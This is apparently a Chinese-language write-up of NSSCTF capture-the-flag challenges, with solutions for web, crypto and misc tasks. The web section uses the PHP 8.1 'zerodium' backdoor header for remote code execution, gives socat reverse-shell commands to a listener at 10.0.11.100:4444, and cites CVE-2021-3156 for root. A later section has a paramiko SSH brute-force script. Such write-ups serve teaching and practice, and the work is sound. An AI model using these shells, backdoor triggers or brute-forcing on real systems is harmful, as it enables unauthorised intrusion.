Web
Becomeroot
首先是个php8.1的后门zerodium
在请求头里加上User-Agentt: zerodium{cmd}
可以实现RCE。
直接弹shell。弹shell之后使用socat增加tty。
#反弹机:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#靶机
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.11.100:4444
然后用CVE-2021-3156
拿root权限即可。
Crypto
过年来下棋
棋盘密码
类型:ADFGVX
,密码lucky。
年画
首先可以发现enc_c
是用NSSCTF{^key
得到的。所以key可以直接拿到。然后就反过来写一个解密就行了。
from PIL import Image
from Crypto.Cipher import AES
from Crypto.Util.Padding import *
enc_c=b'&2#3-(\\x1e9*6"&$\\x02=&'
flag=b"NSSCTF{"
key=b""
for i in range(len(enc_c)):
key += bytes([enc_c[i] ^ flag[i % 7]])
print("[+] Got key: ", key)
w,h = Image.open("random_image.png").size
print(f"[+] Image size: {w}x{h}")
bin_data = "".join(open("cipher.txt").readlines()).replace("\\n", "")
bin_data = [int(bin_data[i:i+8],2) for i in range(0, len(bin_data), 8)]
pixel_data = [bin_data[i:i+3] for i in range(0, len(bin_data), 3)]
print(f"[+] Binary data pixels: {len(pixel_data)}")
print("[+] Recover Pixels with RGB to cipher.png")
img = Image.new("RGB", (w,h))
pixels = img.load()
for x in range(w):
for y in range(h):
pixels[x,y] = tuple(pixel_data[x*h+y])
print("[+] Recover cipher.png with key and save to flag.png")
pixels = img.tobytes()
cipher = AES.new(key, AES.MODE_ECB)
dec_pixels = cipher.decrypt(pixels)
# dec_unpad = unpad(dec_pixels, AES.block_size)
dec_img = Image.frombytes(img.mode, img.size, dec_pixels)
dec_img.save("flag.png")
print("[+] Done! Check flag.png for the flag!")
Misc
温馨的酒吧
成分复杂的一道题()
反正整个交互树都看一遍就有了。
Number 7
cisco设备上的type7加密。
奇奇怪怪的原因最后两位解密不了。后来看了下发现最后两位直接是明文。
from binascii import unhexlify
r = "182A1918071C152E0A4737263A3E780A6F6A075A112742777C687D0700773F7D39560063487D"
r = unhexlify(r[2:])
key = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
print("[+] Cipher: ",r)
for salt in range(52):
f = b""
for i in range(len(r[:-2])):
f += bytes([r[i] ^ key[(i+salt)% len(key)]])
f += r[-2:]
if b"NSSCTF" in f:
print("[+] Found salt: ", salt)
print("[+] Decrypted: ", f)
break
usersssssssss和revenge
其实是同一个题,后面一个把wordlist加长了,flag放在.flag.txt下。(直接ls是看不到的)
直接用paramiko
库写了脚本。
import paramiko
import hashlib
import logging
logging.getLogger("paramiko").setLevel(logging.DEBUG)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
users = open("wl.txt").read().split("\\n")
passs = [hashlib.md5(user.encode()).hexdigest() for user in users]
for user, passw in zip(users, passs):
try:
client.connect("node2.anna.nssctf.cn",28808,username=user,password=passw)
stdin, stdout, stderr = client.exec_command("ls -a")
r = stdout.read().decode().split("\\n")
flag = [i for i in r if "flag" in i]
print(f"[*] {user} {passw} run ls with output {r}")
if flag != []:
print(f"[+] Found flag in user {user} with password {passw}!")
stdin, stdout, stderr = client.exec_command(f"cat {flag[0]}")
print(f"[+] Flag: {stdout.read().decode()}")
break
except Exception as e:
print(f"[-] Failed with user {user} and password {passw}: {e}")
pass
finally:
client.close()